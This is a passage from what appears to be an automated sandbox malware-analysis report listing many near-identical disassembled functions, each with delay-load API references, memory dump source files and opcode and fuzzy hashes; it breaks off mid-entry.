                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: dff164095cc17264171e2eaccc98c8b2aa86ae295eb5d1552710a18a22e81dcf
                                                              • Instruction ID: 2217a5d483af3eb43c63703d65675cf837dfeda88de425f6753304a3ee246bf4
                                                              • Opcode Fuzzy Hash: dff164095cc17264171e2eaccc98c8b2aa86ae295eb5d1552710a18a22e81dcf
                                                              • Instruction Fuzzy Hash: E0B012C12AB14A7D390492A69C07C7701FCC4C0B10771703FB400F5181D8402D084031
                                                              Function 00E931AB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: f76e933c219d8aff03c7e4224adb8bc27475313f459ea6f0e60026bddec380db
                                                              • Instruction ID: 57acff94891852388f96a89b2f1079520a7e686436921d238b00b4543e726d40
                                                              • Opcode Fuzzy Hash: f76e933c219d8aff03c7e4224adb8bc27475313f459ea6f0e60026bddec380db
                                                              • Instruction Fuzzy Hash: 61B002E529A14A7D7A0452B79D4BC7701BCD5C4B11371753FB801F5195A9506E495031
                                                              Function 00E93248 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 071ef481d6df7115fd80e684cf0786e4424e12d4d2f7eb758fbe4d0e02121b7c
                                                              • Instruction ID: c47771579c43254f7f3bc0e813dcb1bf58fb273f54cbfff8e14b434e542d8b02
                                                              • Opcode Fuzzy Hash: 071ef481d6df7115fd80e684cf0786e4424e12d4d2f7eb758fbe4d0e02121b7c
                                                              • Instruction Fuzzy Hash: EFB012D139A14A7D390452A69C07C7701FCC0C0B10370703FB400F5185D8402D088031
                                                              Function 00E93A42 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E93A54
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 3Qo
                                                              • API String ID: 697777088-1944013411
                                                              • Opcode ID: eaeaa6c83c81eaa2e423852c13441de7655749d9bb66985def4757e19be7fbf9
                                                              • Instruction ID: 83269780a9a8b86810db2159ede0f9dce096aeb7563f11d2bfd9b21401b2fef0
                                                              • Opcode Fuzzy Hash: eaeaa6c83c81eaa2e423852c13441de7655749d9bb66985def4757e19be7fbf9
                                                              • Instruction Fuzzy Hash: 63B012C52982457E3A04A1A29C07CF705ACC0C0F103B0721BB800F018294906E481031
                                                              Function 00E9325C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: ad07cbec4a9253b50612a0b313c6f1243032eae7d4f298ab541f6fa485492b96
                                                              • Instruction ID: e0b72de9f876d37f905f512bd816c457d11805a455ecc3998b14ac0bc8efc4e0
                                                              • Opcode Fuzzy Hash: ad07cbec4a9253b50612a0b313c6f1243032eae7d4f298ab541f6fa485492b96
                                                              • Instruction Fuzzy Hash: CAB012C12992497D3A0492A69C43CF701FCC0C0B103B0713BB801F5181D8402E4C0031
                                                              Function 00E93252 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 5e6fe9f8ccc80ce2155ea13e5e4ee379ab5ef60782000f9f9cea0d8a4f2407b6
                                                              • Instruction ID: 844606aedb3e6107ad38ef81e59dd2ddc64fb6cbaebb9b08e97bc0decd658fad
                                                              • Opcode Fuzzy Hash: 5e6fe9f8ccc80ce2155ea13e5e4ee379ab5ef60782000f9f9cea0d8a4f2407b6
                                                              • Instruction Fuzzy Hash: CAB012C1299149BD3D4452A69C43C7701FCC0C0B103B0B03BB800F5181D8402E080031
                                                              Function 00E9322A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 27e7da00a07b3d1edc70f686c540ce913da6ee74c0c03d3fbc225d8e32b9c04b
                                                              • Instruction ID: b9cac3b4c7c63bbff61cd1a6b7568e7bfaad6df134a6e53700bc5389f63528e0
                                                              • Opcode Fuzzy Hash: 27e7da00a07b3d1edc70f686c540ce913da6ee74c0c03d3fbc225d8e32b9c04b
                                                              • Instruction Fuzzy Hash: B2B012D139A14A7D3D0452A69C07C7702FCC0C0B10370B03BB800F5185D8402D080031
                                                              Function 00E93220 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 258efa9bef1d362c4a3f7086df43929c0eb53be9467b112f75de89e6aeff45c9
                                                              • Instruction ID: 60ba5ffb21908483e6a74781a0a81a26defba39197a8e197eba82e150ed4e9d9
                                                              • Opcode Fuzzy Hash: 258efa9bef1d362c4a3f7086df43929c0eb53be9467b112f75de89e6aeff45c9
                                                              • Instruction Fuzzy Hash: D6B012C129A14A7D390452A79C07C7701FCC0C0B10370743FB400F51C1D8402D084031
                                                              Function 00E9323E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: c960b4cc6950e9205a883e9344f53f270fdc0f783fd4ec117f2c45b4cd9d1124
                                                              • Instruction ID: a3f18bb9431c8039d5ef0d0c06e39eaec6f8056aa19ae7831c3cb2d30f498da3
                                                              • Opcode Fuzzy Hash: c960b4cc6950e9205a883e9344f53f270fdc0f783fd4ec117f2c45b4cd9d1124
                                                              • Instruction Fuzzy Hash: 53B012D139A14A7D3A0452A69D47C7701FCC0C0B10370703BB400F52C5E8412E090031
                                                              Function 00E9320C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 02a6af742567cfcaa86b8aef431b01dc21ba660495a9548bf27e61d0fe587fb4
                                                              • Instruction ID: 73f508d070b7a510377f4c1915d2acd7eb760aa315050f2189ccaa76f52cf7d7
                                                              • Opcode Fuzzy Hash: 02a6af742567cfcaa86b8aef431b01dc21ba660495a9548bf27e61d0fe587fb4
                                                              • Instruction Fuzzy Hash: B0B012C129A24A7D394452A79C07CF701FCC0C0B10370B17BB400F5181D8402D480031
                                                              Function 00E93202 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 78d606f98e38fddd7023035a8d8abaf20602165fcf7cfe478a63dd1ab327d95f
                                                              • Instruction ID: 6447eac94b72b676311abbbd0f828d4baee5ca6a88040da7bcd66cd23b9b4663
                                                              • Opcode Fuzzy Hash: 78d606f98e38fddd7023035a8d8abaf20602165fcf7cfe478a63dd1ab327d95f
                                                              • Instruction Fuzzy Hash: 59B012C129A14A7D3D0452A79C07C7701FCC0C0B10370B03BB800F5181D8402D080031
                                                              Function 00E93216 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 46ec5749b4711fd13b966fae6cbd5c17a6a4cd5977079bf8fc85c465510a230b
                                                              • Instruction ID: 0f4fa56850bf930332853a4f72eee0f16788d7eeea30cd2c74702045ba620d32
                                                              • Opcode Fuzzy Hash: 46ec5749b4711fd13b966fae6cbd5c17a6a4cd5977079bf8fc85c465510a230b
                                                              • Instruction Fuzzy Hash: E8B012C129A14A7D3A0452A7DD07C7701FCC0C0F10370703BB400F52C1D8402E090031
                                                              Function 00E931F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: efdfd8b14e763454b6e448e4632dd6444c7a07afe097ba371735f0a87d16322f
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: efdfd8b14e763454b6e448e4632dd6444c7a07afe097ba371735f0a87d16322f
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E932A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E931BD
                                                                • Part of subcall function 00E937B8: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00E937C3
                                                                • Part of subcall function 00E937B8: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E9382B
                                                                • Part of subcall function 00E937B8: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E9383C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                              • String ID: 1
                                                              • API String ID: 697777088-1475023258
                                                              • Opcode ID: 9395b7a750d99e693401931a51390f49175727ee397e9b24ae264b47220bb6b7
                                                              • Instruction ID: 82bee11bc3ca2894610928c6241cee8157b8a819106013f58e70bb8ceda3ae6f
                                                              • Opcode Fuzzy Hash: 9395b7a750d99e693401931a51390f49175727ee397e9b24ae264b47220bb6b7
                                                              • Instruction Fuzzy Hash: 3CA002D51991467D390452A19D46C77017CC4C4B51370652AB401A519559502D495031
                                                              Function 00E932B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
